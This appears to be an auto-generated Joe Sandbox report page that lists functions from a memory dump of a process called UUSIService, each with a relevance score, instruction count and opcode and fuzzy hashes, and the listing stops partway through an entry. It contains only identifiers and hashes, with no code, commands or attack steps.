Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bddd2817aa0ace883d04859d00ab89662b031e3599cc519ede284631d338106
Instruction ID: be9ec251764aefd09283cf7d2927247dfc42de79dc99de2ec1a9f105fd0a0cda
Opcode Fuzzy Hash: 4bddd2817aa0ace883d04859d00ab89662b031e3599cc519ede284631d338106
Instruction Fuzzy Hash: 8851D3707003059FDB16DF28C454BAEBBA2EF85314F15856DE5099B3A2CB75EC46CB40

Function 013806FF Relevance: .6, Instructions: 552COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dd0d1bf6083168368d9ec2af0f3eaf4834cab239a379276aa02f43b9bae0e80
Instruction ID: f697315b6eb20976e1d703d6568afaddd35f224418d6f974514e0a1186a90759
Opcode Fuzzy Hash: 2dd0d1bf6083168368d9ec2af0f3eaf4834cab239a379276aa02f43b9bae0e80
Instruction Fuzzy Hash: A851E4717003059FEB16DF28C854BAE7BA2EF85314F15856DE50A9B3A2CB72EC46CB40

Function 01380708 Relevance: .5, Instructions: 547COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21cb21ce12deaa88c8565ca2ac58af61d423799f86c213c3c0e25240c4ef5874
Instruction ID: 4e988d6253a8ea67b3567b6e2848221b3967808fd15d14514317828e9783662b
Opcode Fuzzy Hash: 21cb21ce12deaa88c8565ca2ac58af61d423799f86c213c3c0e25240c4ef5874
Instruction Fuzzy Hash: 7051E4717003458FDB16DF28C854BAE7BA2EF85314F15856DE50A9B3A2DB75EC42CB40

Function 013806C3 Relevance: .5, Instructions: 544COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b2a05762c4725b537dc646c790373630c543b8905e3cadb18ed6a9ebe6d37ce
Instruction ID: e173b6f598f0d5e468c1dd8188ed20f33a5bc51a2e217688e1043109dbe12442
Opcode Fuzzy Hash: 5b2a05762c4725b537dc646c790373630c543b8905e3cadb18ed6a9ebe6d37ce
Instruction Fuzzy Hash: 405104712043458FEB16DF28C850BAE7BB2EF85318F1585ADE5458F3A2CA36EC46CB41

Function 01380745 Relevance: .5, Instructions: 517COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5da1efd7d1183d798423a4182ea860a7f1f58f72007fa55a172ae691284ca5e
Instruction ID: bac7e85cd335563f098fcdafaf0ca15fb84c9919b3f347c17df0e3649d481109
Opcode Fuzzy Hash: d5da1efd7d1183d798423a4182ea860a7f1f58f72007fa55a172ae691284ca5e
Instruction Fuzzy Hash: 875104703003418FDB16DF28C854BAE7BA2EF85314F15856DE54A8B3A2CB36EC46CB40

Function 01380DE8 Relevance: .4, Instructions: 374COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c5b012fdfe296eac5c8b5aef84612f4d5b048e228b5ced4bdf422abda1fe274
Instruction ID: 5ec9c3698a6964ebc937d8a9f63a161344c3a24e9962961463a7ce01b1ddfc70
Opcode Fuzzy Hash: 0c5b012fdfe296eac5c8b5aef84612f4d5b048e228b5ced4bdf422abda1fe274
Instruction Fuzzy Hash: 31F10475A002498FDB15DFA8C484ADCBBF2FF49324F188195E445AB366DB31AD85CF60

Function 01380DDB Relevance: .4, Instructions: 352COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcc7d8256fea7eb0c3021b80688ad7f7f7c0fc5b1f80b6169c1e1c62f5791403
Instruction ID: a659330151772e534f6fc48bdced662070d023fb254d06b082a2aa0a60078a3a
Opcode Fuzzy Hash: dcc7d8256fea7eb0c3021b80688ad7f7f7c0fc5b1f80b6169c1e1c62f5791403
Instruction Fuzzy Hash: A2F11775A002488FDB15DFA8C484ADDBBF2FF49324F198195E445AB362DB31AD85CF60

Function 01383805 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aad33589fd826f0fa64b50fef6917aff2e5c6ecb63e52dc52a0d875edaa53b14
Instruction ID: 13506940f92451ca7c4c783b8e0291603a7d1b8d52f43ad1d06b222332d1110a
Opcode Fuzzy Hash: aad33589fd826f0fa64b50fef6917aff2e5c6ecb63e52dc52a0d875edaa53b14
Instruction Fuzzy Hash: 94C18A71E052499FDB0ADF68D490A9DBBF1FF89310F158196E845EB362DA30EC46CB60

Function 013877D0 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b6f61005533ce8ca0d6c11eb10fed3877efa8bef09257156e75ce1a4ebfb2bc
Instruction ID: 721975ad288737c2bd9ed3e2778576fccdec5031871a6267117ddc251c13b61a
Opcode Fuzzy Hash: 0b6f61005533ce8ca0d6c11eb10fed3877efa8bef09257156e75ce1a4ebfb2bc
Instruction Fuzzy Hash: 86C15A70E01209CFDB15DF68D484A9DBBF2BF89314F2581AAE815EB365DB30AD46CB50

Function 01383900 Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d89c659d433bddd57d76b3fd0582a01c56aed65743b97c62a03f3fc5a6d129c8
Instruction ID: 69a1d0549bf04aca3b48d86e1761be121c0de378ebc8e7f4cfd748b7cb9f0327
Opcode Fuzzy Hash: d89c659d433bddd57d76b3fd0582a01c56aed65743b97c62a03f3fc5a6d129c8
Instruction Fuzzy Hash: 2EC14674E012499FDB09DF68D480A9DBBF2BF89300F1581A6E845EB366DB30ED45CB50

Function 01384D30 Relevance: .3, Instructions: 279COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31473945f0c4a3631e224604aeb907faee1a69808ad34a04ca146d4af394ac86
Instruction ID: c890835ad595aa3a9e531fe3b31e4ed088b8948664b390c5f4d19b29519e9a01
Opcode Fuzzy Hash: 31473945f0c4a3631e224604aeb907faee1a69808ad34a04ca146d4af394ac86
Instruction Fuzzy Hash: 13C10774A01219DFCB05DF68D480A9DBBF2FF88314F198695E445AB366DB30ED86CB80

Function 013838F1 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7675db2e6ca2f375341238f0086380411f4d247870f98e4f924e69d7c646811a
Instruction ID: 383f627ef4877c11ddc01af3e7b6c79793d17f4da0efce0e8d4026a55ffb4322
Opcode Fuzzy Hash: 7675db2e6ca2f375341238f0086380411f4d247870f98e4f924e69d7c646811a
Instruction Fuzzy Hash: 1CB14370E012499FDB09DF68D480A9DBBF2BF89310F1581A6E856EB366DB30ED45CB50

Function 01382C50 Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113ec44d8a7f52fb1e81e8539957fd1f51a918fc3173df93b4a5441e3941eb54
Instruction ID: fec545cd3d91b7441d78e2fd0e2f7ebe15ccb1928ab588acc875324bb7fadbaf
Opcode Fuzzy Hash: 113ec44d8a7f52fb1e81e8539957fd1f51a918fc3173df93b4a5441e3941eb54
Instruction Fuzzy Hash: 7BA131B5A102589FDB16DFA8D880ACDBBF2FF4A300F104295F851AB3A5D731AD45CB60

Function 01386A58 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27acbb16d0e164635525aa735ae6695303d93b783c451802ceadff225f4fdcdf
Instruction ID: 9dfda845bc2fcfe69b17437a5e5484a231305c5c4a09ed6a8d9334fac6184338
Opcode Fuzzy Hash: 27acbb16d0e164635525aa735ae6695303d93b783c451802ceadff225f4fdcdf
Instruction Fuzzy Hash: 6961C4713002059FDB16DF69C450B6E7BA2EF85314F14C56DE90A9B392CE36EC46CB91

Function 013826A8 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 493e120a26a8f480a8e3cdc28fe87ff5cbb8a5035dc475e6ad5b3802e3471ed9
Instruction ID: fa0a3ebcc81bc083f403c73009fa317e50e9b30a04c3b491f50d7cd2848c3e44
Opcode Fuzzy Hash: 493e120a26a8f480a8e3cdc28fe87ff5cbb8a5035dc475e6ad5b3802e3471ed9
Instruction Fuzzy Hash: D4513671E10318CFDF14EFAAC884BDEBBB5AF88314F148029E415AB244DB749946CF81

Function 0138269C Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 112f0a4e0a8ec7535d1ed5246fc6ca595dec542b8d563c617c32b51a14a4f49a
Instruction ID: c0abbf8492d46ed6f965fd08573565add2a2c7a8a113dab83f75f88588bb57f5
Opcode Fuzzy Hash: 112f0a4e0a8ec7535d1ed5246fc6ca595dec542b8d563c617c32b51a14a4f49a
Instruction Fuzzy Hash: A15124B0D00359DFEB14EFAAC884BDEBBF5AF48708F148029E415AB254DB749946CF81

Function 01382898 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae4137cfe76c1fc9d2a44d1094ae9bcfbf03ce62986ec2d2ed97f9f6bd018c08
Instruction ID: ea5fa57b175bb8fdf863c0f23802abb7ac512d660bd92d92f7b2d0815429c2a4
Opcode Fuzzy Hash: ae4137cfe76c1fc9d2a44d1094ae9bcfbf03ce62986ec2d2ed97f9f6bd018c08
Instruction Fuzzy Hash: 5C516771E00349CFEB14DFA9D8907EEBBF5AF88354F248029D859AB250DB349942CB81

Function 01380B28 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 012338b23419013eac6cec24cf6afb5ea29caf8523e18ab8dcbce65c183de870
Instruction ID: 351671695e672a01fe20597f593982b07938854b7c3387dd7e801d61666d6ca8
Opcode Fuzzy Hash: 012338b23419013eac6cec24cf6afb5ea29caf8523e18ab8dcbce65c183de870
Instruction Fuzzy Hash: BA41E0B0A00745CFDF2ADF28D84069EBBF1FF89300B10466AE486EB6A5D730A844CF50

Function 01382338 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e53f95e8ce9d181a4416a3204f172e0b35eb71d95e349d390bcc83feefe5346
Instruction ID: 563da9df280570833970115f1364e202d40a19c034ab857c46bbbdb148ac1103
Opcode Fuzzy Hash: 0e53f95e8ce9d181a4416a3204f172e0b35eb71d95e349d390bcc83feefe5346
Instruction Fuzzy Hash: F041B630A01345AFD715EF78D890A9EBBF6FF84244F108629E45A9B791DB30AC05CB90

Function 0138288D Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e9e5f1be075ec4a5512e58885b3c0a760e450b8421538994111ccbdacf0788c
Instruction ID: 43d442c51339201ca0831a1ad7e190da79cab5df7d2ddb4085d567aff83d3eb2
Opcode Fuzzy Hash: 7e9e5f1be075ec4a5512e58885b3c0a760e450b8421538994111ccbdacf0788c
Instruction Fuzzy Hash: B14176B0E003498FDB10DFA9C890BDEBBF5AF48754F248029E859EB254DB749941CF81

Function 01381D28 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f63104447cef589fc61bad7b230b6354525699700d29565a38ddc999fa7ab96
Instruction ID: d920e7bab12700be0e49db1dccf3a339edc92593f3884f5c3c3a949fca17acd7
Opcode Fuzzy Hash: 8f63104447cef589fc61bad7b230b6354525699700d29565a38ddc999fa7ab96
Instruction Fuzzy Hash: BA31D631A113069FDB25DF78E44059DFBF2FF85210B108A6EE09A9B295DB30AD46CB41

Function 01384AA9 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 112c7cfe54b2a047bba66f9866f5e85f6d5a0bdda9cb07432a8b90128663c398
Instruction ID: c5b0d7314bd7a888482ef0302c0d809e5428480f3cec078aac2d271eb076575b
Opcode Fuzzy Hash: 112c7cfe54b2a047bba66f9866f5e85f6d5a0bdda9cb07432a8b90128663c398
Instruction Fuzzy Hash: 40418D709047568FDB26DF28C8407DEBBF6FF88300F144A5AD496EBA95D734A844CB61

Function 013846F7 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d1900cc6d8e2c278a73beaabe30e6b68aa83fb286e84759c12b4e537cddb3c8
Instruction ID: 19187f5a6e22d0e7165fd1a15bc7dc5f56d7cdc45ce9fca8788f12e2e59fc8d0
Opcode Fuzzy Hash: 8d1900cc6d8e2c278a73beaabe30e6b68aa83fb286e84759c12b4e537cddb3c8
Instruction Fuzzy Hash: 54312735A102598FDB06DFA8C890ADDBBF2FF8A214B244195E441BB365D731AD01CB60

Function 01384490 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e62b6a2e5d65c62819769bb16d5cdf9df65e06d49d0929ca10bc0974792cfea
Instruction ID: db7f321888344fefb874621a8535cee90029ebd4b3a09b05d3a47353d2412c33
Opcode Fuzzy Hash: 2e62b6a2e5d65c62819769bb16d5cdf9df65e06d49d0929ca10bc0974792cfea
Instruction Fuzzy Hash: F731BC30A046569FDB15EF29C84079EBBF6FF88304F144629D44AABA91DB34E815CBA1

Function 01385CF5 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82329a1f3fdf5b84056af3f65acb4a899eaeae17d447043f457ec78649fe4187
Instruction ID: 44bf30b1bb231927cd4e9eaa08d82e2b64405736e2268881f8784284748fbbf0
Opcode Fuzzy Hash: 82329a1f3fdf5b84056af3f65acb4a899eaeae17d447043f457ec78649fe4187
Instruction Fuzzy Hash: 8D316870D01249DFDB14DFAAC580AEEBFF5AF48300F248029E949AB350DB349945CF90

Function 01383EF8 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4006592f911e68b6c2a4de535202159a9b0c98bbf5358b54e24e86a31af18a2
Instruction ID: 34b663b20f87928e1d6401d11eb84043ec441d03b00439cf4c73287788f60458
Opcode Fuzzy Hash: e4006592f911e68b6c2a4de535202159a9b0c98bbf5358b54e24e86a31af18a2
Instruction Fuzzy Hash: 74318D31A012099FCB14EF79D5A5AAEBBF1FF48604F248069E442EB354DB30EC45CB90

Function 01385D00 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1664e194be0ca4e35d43c77bfb545ad377b6630b18573e9ce5dac990713f3c05
Instruction ID: 7c6d7bad2f586d9b6716c088a452c51897f144c387b7e9645595a23825b5f272
Opcode Fuzzy Hash: 1664e194be0ca4e35d43c77bfb545ad377b6630b18573e9ce5dac990713f3c05
Instruction Fuzzy Hash: 7E315870D01249DFDB14DFAAC584ADEBFF5AF48300F248029E909AB350DB349945CF90

Function 01382A3C Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61825e5eb8e2df01365c2d56972246325e1d110ef4008d44d899db95725605ea
Instruction ID: 93df41127175a3e70cf9364ac1f989e8fa977d6272b667d112e0e5244ce2aaa8
Opcode Fuzzy Hash: 61825e5eb8e2df01365c2d56972246325e1d110ef4008d44d899db95725605ea
Instruction Fuzzy Hash: C63143B0C053489FDB25DFA9C894BDEBFF4AF48204F28846AD045AB251CB389946CB61

Function 01383F08 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1875eb824c11989bf945d249134b9b15abff5e1fbb6f98eb5aab7a5db6b91f3b
Instruction ID: 580e399c305f944bfbb3f09990fadc68fef5eabe8206d6131ff288976bdc9364
Opcode Fuzzy Hash: 1875eb824c11989bf945d249134b9b15abff5e1fbb6f98eb5aab7a5db6b91f3b
Instruction Fuzzy Hash: A8318E30A012099FCB14EF79D594A9EBBF2FF48604F208069E542EB354DB30EC45CB90

Function 01382A48 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5311b088ac3b842351b9a1d30b5f9126f584e791f569656b07f46085a6921f40
Instruction ID: c221de2ff0c0d95dfb97e8247d72b0475de9c0349728d5b8bf42214806d1d1ee
Opcode Fuzzy Hash: 5311b088ac3b842351b9a1d30b5f9126f584e791f569656b07f46085a6921f40
Instruction Fuzzy Hash: 213112B5D01318DFDB14DFAAD894BDEFBF9AF88314F24802AE405A7240CB74A945CB90

Function 01380A60 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 601951515443419aac8a9f81818c285fd3b8cb0a49e1f7134b37d27f84b6f04f
Instruction ID: 139b791c92ea4c00908098a34318149cfaa03e328b7390cb3fef0ccd5990ad19
Opcode Fuzzy Hash: 601951515443419aac8a9f81818c285fd3b8cb0a49e1f7134b37d27f84b6f04f
Instruction Fuzzy Hash: C62147343111019FC749EB39E858A2D7BE2FF8DA1176540A9E50ACB3B6DA72DC068B51

Function 01385498 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27948a43a9e4a39e36e640e4d81e0542ebafa0d92f79087d7d424a5ce32f0b8d
Instruction ID: 1ccf808c9aa43a2fddd2139d4d365cbda13392fe7f3941c499f71e4c7a99b91f
Opcode Fuzzy Hash: 27948a43a9e4a39e36e640e4d81e0542ebafa0d92f79087d7d424a5ce32f0b8d
Instruction Fuzzy Hash: EF214F31E00305CBDB15EB6CC854BAEB7B6EB48758F148429D802AB394DB719C41CFA0

Function 01380A70 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17a78c33d2cdde38a165d9be04323365ae7cc55f996b36973fa5c86fe5ea3a90
Instruction ID: 201f26b1a5de584363e484b9d1777f49943eb8b52c9919e0a26b8c9acf879667
Opcode Fuzzy Hash: 17a78c33d2cdde38a165d9be04323365ae7cc55f996b36973fa5c86fe5ea3a90
Instruction Fuzzy Hash: 431119343104118FC748EB39D598A2D7BE6FFCDA1076540A8E50ACB3B6DE71EC068B91

Function 013854A8 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d98984929ce8fc15eeccac8740bfe6679e6990fb496df47a1a94464c70872d6b
Instruction ID: b3a5bb75dfd0d8a2079df54c418b6306ee1c1e0999fce0e2f7c0f1b06f875627
Opcode Fuzzy Hash: d98984929ce8fc15eeccac8740bfe6679e6990fb496df47a1a94464c70872d6b
Instruction Fuzzy Hash: 97215131E00305CBDB14FBADC454AAEB7B6AB88748F148028D802B7394CB71DC45CFA0

Function 013825D1 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23adcf885dff7c2633e617dcbd64068c90b5990a864e6c9902e641aa9544b8ef
Instruction ID: 359c47d1d989dc8fc9d04f199f14edefd1eb5793e0e587c26aca208cf339c9b6
Opcode Fuzzy Hash: 23adcf885dff7c2633e617dcbd64068c90b5990a864e6c9902e641aa9544b8ef
Instruction Fuzzy Hash: 4211B131E107068BCB05EB78D8644EEF7B1EFD9200710C65AE45AA7215EF30A986C790

Function 013856E2 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e84ca48f0b4b27ea74a30c8653ffd8f44d9d03c45e33f4613f5a89f660470965
Instruction ID: 75dd35ea01ebbbfdc6f9c5af4630b836f0758bd399f81f75645104f9873f3b37
Opcode Fuzzy Hash: e84ca48f0b4b27ea74a30c8653ffd8f44d9d03c45e33f4613f5a89f660470965
Instruction Fuzzy Hash: CE119331E107068BCB05EBB8D8A45AFF3B5FFD5200B10C619E45AA7204EF34A99587D4

Function 01380E79 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b1600c76cc53fd5613961545b65d7f88c0b0c58036e38e755fa22b4beec832a
Instruction ID: f871ef673d7ec476726b2e8c17e3dd7be2feccfe259526cab2286e1b4dc1f07f
Opcode Fuzzy Hash: 9b1600c76cc53fd5613961545b65d7f88c0b0c58036e38e755fa22b4beec832a
Instruction Fuzzy Hash: 88219B35A002488FDB15DFA8D4849DDBBF2FF89220F189095E905AB266DB71AD85CF60

Function 013825E0 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3377647627.0000000001380000.00000040.00000800.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 394536b49b921bd903ad547da12ef8be4251d3d21afe031b98415d884c9fe37d
Instruction ID: f00117c420074044811c121ece7c52aadf579f85e9db5320784c7ff583e029db
Opcode Fuzzy Hash: 394536b49b921bd903ad547da12ef8be4251d3d21afe031b98415d884c9fe37d
